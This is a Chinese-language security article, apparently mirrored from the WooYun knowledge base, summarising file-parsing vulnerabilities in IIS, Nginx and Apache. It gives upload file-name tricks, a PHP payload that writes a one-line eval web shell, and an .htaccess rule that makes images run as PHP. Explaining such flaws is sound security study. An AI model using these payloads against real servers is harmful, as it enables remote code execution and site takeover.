解析漏洞總結

wyzsk發表於2020-08-19
作者: erevus · 2013/09/02 11:25

一、IIS 5.x/6.0解析漏洞


IIS 6.0解析利用方法有兩種

1.目錄解析

/xx.asp/xx.jpg

2.檔案解析

wooyun.asp;.jpg 

第一種,在網站下建立資料夾的名字為 .asp、.asa 的資料夾,其目錄內的任何副檔名的檔案都被IIS當作asp檔案來解析並執行。

例如建立目錄 wooyun.asp,那麼

/wooyun.asp/1.jpg

將被當作asp檔案來執行。假設黑闊可以控制上傳資料夾路徑,就可以不管你上傳後你的圖片改不改名都能拿shell了。

第二種,在IIS6.0下,分號後面的不被解析,也就是說

wooyun.asp;.jpg

會被伺服器看成是wooyun.asp

還有IIS6.0 預設的可執行檔案除了asp還包含這三種

/wooyun.asa
/wooyun.cer
/wooyun.cdx

烏雲上的IIS 6.0解析漏洞利用案例

http://www.wooyun.org/searchbug.php?q=IIS6.0

二、IIS 7.0/IIS 7.5/ Nginx <8.03畸形解析漏洞


Nginx解析漏洞這個偉大的漏洞是我國安全組織80sec發現的…

在預設Fast-CGI開啟狀況下,黑闊上傳一個名字為wooyun.jpg,內容為

<?PHP fputs(fopen('shell.php','w'),'<?php eval($_POST[cmd])?>');?>

的檔案,然後訪問wooyun.jpg/.php,在這個目錄下就會生成一句話木馬 shell.php

這個漏洞案例

WooYun: 用友軟體某分站SQL隱碼攻擊漏洞+nginx解析漏洞

WooYun: 新浪網分站多處安全漏洞(nginx解析+SQL注射等)小禮包

WooYun: kingsoft.com某x級域名nginx解析漏洞+爆路徑

三、Nginx <8.03 空位元組程式碼執行漏洞


影響版:0.5.,0.6., 0.7 <= 0.7.65, 0.8 <= 0.8.37

Nginx在圖片中嵌入PHP程式碼然後透過訪問

xxx.jpg%00.php

來執行其中的程式碼

Nginx 空位元組代執行漏洞案例

http://www.wooyun.org/searchbug.php?q=%2500.php

四、Apache解析漏洞


Apache 是從右到左開始判斷解析,如果為不可識別解析,就再往左判斷.

比如 wooyun.php.owf.rar “.owf”和”.rar” 這兩種字尾是apache不可識別解析,apache就會把wooyun.php.owf.rar解析成php.

如何判斷是不是合法的字尾就是這個漏洞的利用關鍵,測試時可以嘗試上傳一個wooyun.php.rara.jpg.png…(把你知道的常見字尾都寫上…)去測試是否是合法字尾

Apache解析漏洞案例

http://www.wooyun.org/searchbug.php?q=apache%E8%A7%A3%E6%9E%90

五、其他


在windows環境下,xx.jpg[空格] 或xx.jpg. 這兩類檔案都是不允許存在的,若這樣命名,windows會預設除去空格或點,駭客可以透過抓包,在檔名後加一個空格或者點繞過黑名單.若上傳成功,空格和點都會被windows自動消除,這樣也可以getshell。

如果在Apache中.htaccess可被執行.且可被上傳.那可以嘗試在.htaccess中寫入: 

<FilesMatch "wooyun.jpg"> SetHandler application/x-httpd-php </FilesMatch>

然後再上傳shell.jpg的木馬, 這樣shell.jpg就可解析為php檔案。

本文章來源於烏雲知識庫,此映象為了方便大家學習研究,文章版權歸烏雲知識庫!

相關文章